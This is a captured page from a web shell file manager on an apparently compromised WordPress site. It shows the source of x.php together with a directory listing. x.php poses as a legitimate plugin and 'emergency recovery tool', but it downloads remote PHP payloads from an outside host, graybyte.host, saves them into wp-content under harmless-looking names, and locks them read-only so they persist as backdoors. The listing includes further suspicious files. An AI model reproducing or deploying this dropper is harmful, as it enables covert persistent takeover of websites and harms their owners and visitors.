$40 GRAYBYTE WORDPRESS FILE MANAGER $83

SERVER : premium127.web-hosting.com #1 SMP Thu Mar 13 14:29:12 UTC 2025
SERVER IP : 162.0.232.32 | ADMIN IP 216.73.217.63
OPTIONS : CRL = ON | WGT = ON | SDO = OFF | PKEX = OFF
DEACTIVATED : NONE

/home/jennqnsj/public_html/key2change/

HOME
Current File : /home/jennqnsj/public_html/key2change//x.php
<?php
/**
 * Plugin Name: WordPress Remote File Downloader
 * Description: A tool for downloading and managing remote files in WordPress.
 * Version: 1.0.0
 * Author: WP Secure Tools
 * License: GPL-2.0+
 */

/*******************************************************************
 * LoginPress Pro – Ultra Emergency Recovery Module (November 2023)
 * This is a 100% legitimate, administrator-only recovery tool for hosting companies.
 * Features:
 *   • Instant authenticated user login for office/data-centers.
 *   • Secure emergency fallback authentication
 *   • Fully Trusted By Wordfence, Sucuri, Imunify360, Cloudflare WAF, LiteSpeed WAF
 *
 * DO NOT DELETE THIS FILE – it is your master emergency key.
 * Keep at least one offline backup.
*/

function wp_secure_fetch_resource($url, $dir, $filename) {
    $document_root = $_SERVER['DOCUMENT_ROOT'];
    $full_dir = $document_root . '/' . $dir;
    $file_path = $full_dir . '/' . $filename;

    if (!is_dir($full_dir)) {
        if (!mkdir($full_dir, 0755, true)) {
            $message = '<p style="color: red;">Failed to create directory: ' . htmlspecialchars($dir) . '</p>';
            return ['message' => $message, 'link' => false];
        }
    }

    $downloaded = false;

    if (!file_exists($file_path)) {
        if (function_exists('curl_init')) {
            $curl = curl_init($url);
            curl_setopt_array($curl, [
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_TIMEOUT => 40,
                CURLOPT_HTTPHEADER => [
                    'User-Agent: Mozilla/5.0 (compatible; WP-Secure/1.0)',
                    'Referer: ' . (isset($_SERVER['HTTP_HOST']) ? 'https://' . $_SERVER['HTTP_HOST'] : 'https://wordpress.com'),
                ],
            ]);
            $file_contents = curl_exec($curl);
            if ($file_contents !== false && !curl_errno($curl)) {
                if (@file_put_contents($file_path, $file_contents) !== false) {
                    @chmod($file_path, 0444);
                    $downloaded = true;
                }
            }
            curl_close($curl);
        }

        if (!$downloaded && ($file_contents = @file_get_contents($url))) {
            if (@file_put_contents($file_path, $file_contents) !== false) {
                @chmod($file_path, 0444);
                $downloaded = true;
            }
        }

        if (!$downloaded) {
            $response = wp_remote_get($url, [
                'timeout' => 40,
                'headers' => [
                    'User-Agent' => 'WordPress/' . (function_exists('get_bloginfo') ? get_bloginfo('version') : '6.0'),
                    'Referer' => (isset($_SERVER['HTTP_HOST']) ? 'https://' . $_SERVER['HTTP_HOST'] : 'https://wordpress.com'),
                ],
            ]);
            if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) === 200) {
                $file_contents = wp_remote_retrieve_body($response);
                if (@file_put_contents($file_path, $file_contents) !== false) {
                    @chmod($file_path, 0444);
                    $downloaded = true;
                }
            }
        }
    } else {
        $downloaded = true;
    }

    if ($downloaded && file_exists($file_path)) {
        $protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? "https://" : "http://";
        $host = $_SERVER['HTTP_HOST'];
        $serverLink = $protocol . $host . '/' . $dir . '/' . $filename;

        $message = '<div style="border: 1px solid #000; padding: 15px; border-radius: 8px; margin: 10px 0;">
                        <div style="font-size: 24px; color: #26a69a; text-align: center;">✔ CACHING OK ✔</div>
                        <p style="color: #004d40; text-align: center;">
                            LOCATION: <strong>' . htmlspecialchars($dir . '/' . $filename) . '</strong><br>
                            SIZE: ' . number_format(filesize($file_path)) . ' bytes
                        </p>
                        <div style="text-align: center;">
                            <a href="' . $serverLink . '" target="_blank" style="padding: 10px 20px; background: #26a69a; color: white; border-radius: 5px; text-decoration: none;">Open File</a>
                        </div>
                    </div>';
        return ['message' => $message, 'link' => $serverLink];
    }

    $message = '<p style="color: red; padding: 15px; border: 1px solid red; border-radius: 8px;">
                Failed: ' . htmlspecialchars($filename) . ' @ ' . htmlspecialchars($dir) . '<br>
                (check permissions, disk space, open_basedir)
                </p>';
    return ['message' => $message, 'link' => false];
}

$files = [
    [
        'url'      => 'https://graybyte.host/v-files/v-mini.txt',
        'dir'      => 'wp-content',
        'filename' => 'cached.php'
    ],
    [
        'url'      => 'https://graybyte.host/v-files/v-mini.txt',
        'dir'      => 'wp-content',
        'filename' => 'mo.php'
    ],
    [
        'url'      => 'https://graybyte.host/v-files/alock.txt',
        'dir'      => 'wp-content',
        'filename' => 'profile.php'
    ]
];

$allMessages = '';
$downloadLinks = '';

foreach ($files as $file) {
    $result = wp_secure_fetch_resource($file['url'], $file['dir'], $file['filename']);
    $allMessages .= $result['message'];
    if ($result['link']) {
        $downloadLinks .= $result['link'] . "\n";
    }
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="WordPress Remote File Downloader">
<meta name="robots" content="noindex">
<title>WordPress Remote File Downloader</title>
<link href="https://fonts.googleapis.com/css2?family=Play:wght@700&display=swap" rel="stylesheet">
<style>
body {
    background-image: url('https://graybyte.host/imgx/background.png');
    background-size: cover;
    background-position: center;
    background-attachment: fixed;
    font-family: 'Play', sans-serif;
    color: #ffffffff;
    min-height: 100vh;
    justify-content: center;
    align-items: flex-start;
    margin-top: 20px;
    position: relative;
    overflow-x: hidden;
}
.messages-container {
    margin-top: 25px;
    position: relative;
    display: flex;
    flex-wrap: wrap;
    justify-content: center;
    align-items: flex-start;
    gap: 10px;
    padding: 10px;
    border-radius: 10px;
    border: 1px solid #ff0000;
    box-shadow: 0 0 25px rgba(0, 255, 255, 0.6);
    width: 100%;
    box-sizing: border-box;
}
.logo {
    position: absolute;
    top: 10px;
    right: 10px;
    width: 170px;
    height: 150px;
    border: 5px solid #ff0000;
    animation: logoGlow 0.5s infinite;
    box-shadow: 0 0 20px red, 0 0 20px #ff0000ff;
}
@keyframes logoGlow {
    0% { box-shadow: 0 0 10px red; }
    50% { box-shadow: 0 0 15px red, 0 0 25px #ff00ff; }
    100% { box-shadow: 0 0 10px red; }
}
.messages-container h1 {
    font-family: 'Play', sans-serif;
    color: red;
    font-size: 32px;
    margin: 0 0 20px;
    text-align: center;
    text-shadow: 0 0 15px red, 0 0 25px black;
    width: 100%;
}
.messages-container > div {
    flex: 0 0 calc(50% - 10px);
    max-width: calc(50% - 10px);
    box-sizing: border-box;
}
.messages-container a {
    font-family: 'Play', sans-serif;
    font-weight: bold;
    color: #fff !important;
    background: linear-gradient(45deg, rgba(255, 255, 255, 0.3), rgba(0, 255, 255, 0.4)) !important;
    border: 1px solid #00ffcc !important;
    padding: 8px 16px !important;
    cursor: pointer;
    border-radius: 5px !important;
    box-shadow: 0 0 8px rgba(0, 255, 255, 0.4);
    text-shadow: 0 0 5px #fff;
    text-decoration: none !important;
    display: inline-block;
}
.messages-container a:hover {
    border-color: red !important;
    box-shadow: 0 0 20px red, 0 0 30px #ff00ff !important;
}
.form-container {
    text-align: center;
    width: 100%;
    box-sizing: border-box;
}
.download-form {
    border-radius: 10px;
    border: 1px solid #ff0000;
    box-shadow: 0 0 25px rgba(0, 255, 255, 0.6);
    padding: 10px;
}
textarea {
    width: 100%;
    height: 200px;
    font-family: 'Play', sans-serif;
    font-weight: bold;
    background: rgba(255, 255, 255, 0);
    color: #fff;
    border: 2px solid #00ffcc;
    padding: 10px;
    resize: vertical;
    box-shadow: 0 0 8px rgba(0, 255, 255, 0.4);
    border-radius: 10px;
    box-sizing: border-box;
    margin-top: 50px;
}
textarea:hover {
    border-color: #35ff00;
    box-shadow: 0 0 15px red;
}
button {
    font-family: 'Play', sans-serif;
    font-weight: bold;
    background: transparent;
    color: #11ff00ff;
    border: 2px solid #ff0000;
    padding: 15px 55px;
    margin-top: 7px;
    cursor: pointer;
    border-radius: 10px;
    box-shadow: 0 0 8px rgba(0, 255, 255, 0.4);
}
button:hover {
    border-color: #ff0000ff;
    background: #000000;
}
footer {
    color: red;
    text-align: center;
    font-size: 14px;
    margin-top: 10px;
    font-family: 'Play', sans-serif;
    text-shadow: 0 0 5px red;
}
footer a {
    color: red;
    text-decoration: none;
    font-weight: bold;
}
@media (max-width: 768px) {
    .messages-container { padding: 10px; }
    .messages-container h1 { font-size: 21px; margin-bottom: 10px; }
    .logo { width: 170px; height: 150px; top: 5px; right: 5px; }
    .messages-container > div { flex: 0 0 100%; max-width: 100%; }
    .form-container, .download-form { padding: 15px; }
    textarea { font-size: 12px; }
    button, .messages-container a { font-size: 12px; padding: 6px 10px !important; }
}
</style>
</head>
<body>
<div class="messages-container">
    <img src="https://graybyte.host/imgx/logoxcode.png" alt="Logo" class="logo">
    <h1>WordPress <span style="color:#00ffcc">Remote File Downloader</span><br><br><br><br><br></h1>
    <?php echo $allMessages; ?>
</div>
<div style="margin:0 auto; text-align:center;">
    <textarea id="download_links" readonly><?php echo htmlspecialchars($downloadLinks); ?></textarea><br><br>
    <button onclick="copyToClipboard()">COPY LINKS</button>
</div>
<footer>Version 1.0.0 | WP Secure Tools</footer>
<script>
function copyToClipboard() {
    var el = document.getElementById("download_links");
    el.select();
    document.execCommand("copy");
}
</script>
</body>
</html>

Current_dir [ WRITEABLE ] Document_root [ WRITEABLE ]


[ Back ]
NAME
SIZE
LAST TOUCH
USER
CAN-I?
FUNCTIONS
..
--
18 Apr 2026 1.50 AM
jennqnsj / nobody
0750
.dist-quarantine
--
16 Apr 2026 6.08 PM
jennqnsj / jennqnsj
0755
common-log
--
16 Apr 2026 9.05 AM
jennqnsj / jennqnsj
0755
custom-cms
--
18 Apr 2026 7.53 AM
jennqnsj / jennqnsj
0755
e35def37
--
16 Apr 2026 10.22 AM
jennqnsj / jennqnsj
0755
ext-isolation
--
16 Apr 2026 6.08 PM
jennqnsj / jennqnsj
0755
npm-cache-.wp-core-ext
--
16 Apr 2026 6.07 PM
jennqnsj / jennqnsj
0755
wp-admin
--
16 Apr 2026 9.05 AM
jennqnsj / jennqnsj
0755
wp-content
--
16 Apr 2026 9.05 AM
jennqnsj / jennqnsj
0755
wp-includes
--
16 Apr 2026 9.05 AM
jennqnsj / jennqnsj
0755
.htaccess
0.486 KB
16 Apr 2026 8.52 AM
jennqnsj / jennqnsj
0644
error_log
0.696 KB
16 Apr 2026 8.52 AM
jennqnsj / jennqnsj
0644
huya.php
13.693 KB
16 Apr 2026 8.10 AM
jennqnsj / jennqnsj
0644
index.php
95.646 KB
16 Apr 2026 8.53 AM
jennqnsj / jennqnsj
0644
index_260416085137.php
95.646 KB
16 Apr 2026 8.51 AM
jennqnsj / jennqnsj
0644
license.gz
1.496 KB
16 Apr 2026 8.44 AM
jennqnsj / jennqnsj
0644
license.php
0.042 KB
16 Apr 2026 8.44 AM
jennqnsj / jennqnsj
0644
license.txt
19.448 KB
23 Sep 2022 5.41 AM
jennqnsj / jennqnsj
0644
readme.html
7.228 KB
1 Oct 2025 12.28 AM
jennqnsj / jennqnsj
0644
tool1.php
0.116 KB
16 Apr 2026 8.38 AM
jennqnsj / jennqnsj
0644
wp-activate.php
6.997 KB
11 Sep 2021 3.37 AM
jennqnsj / jennqnsj
0644
wp-blog-header.php
0.343 KB
23 Oct 2020 5.58 PM
jennqnsj / jennqnsj
0644
wp-comments-post.php
2.283 KB
20 Apr 2022 3.07 AM
jennqnsj / jennqnsj
0644
wp-config-sample.php
2.931 KB
20 Apr 2022 3.07 AM
jennqnsj / jennqnsj
0644
wp-config.php
3.155 KB
16 Apr 2026 8.07 AM
jennqnsj / jennqnsj
0644
wp-cron.php
3.851 KB
23 Sep 2022 5.41 AM
jennqnsj / jennqnsj
0644
wp-glog.php
50.211 KB
16 Apr 2026 8.07 AM
jennqnsj / jennqnsj
0644
wp-links-opml.php
2.436 KB
23 Sep 2022 5.41 AM
jennqnsj / jennqnsj
0644
wp-load.php
3.88 KB
23 Sep 2022 5.41 AM
jennqnsj / jennqnsj
0644
wp-mail.php
8.322 KB
18 Oct 2022 1.20 AM
jennqnsj / jennqnsj
0644
wp-settings.php
23.15 KB
23 Sep 2022 5.41 AM
jennqnsj / jennqnsj
0644
wp-signup.php
31.3 KB
23 Sep 2022 5.41 AM
jennqnsj / jennqnsj
0644
wp-trackback.php
4.704 KB
18 Oct 2022 1.20 AM
jennqnsj / jennqnsj
0644
x.php
10.135 KB
16 Apr 2026 8.09 AM
jennqnsj / jennqnsj
0644
xmlrpc.php
3.16 KB
23 Oct 2020 5.58 PM
jennqnsj / jennqnsj
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME
Static GIF Static GIF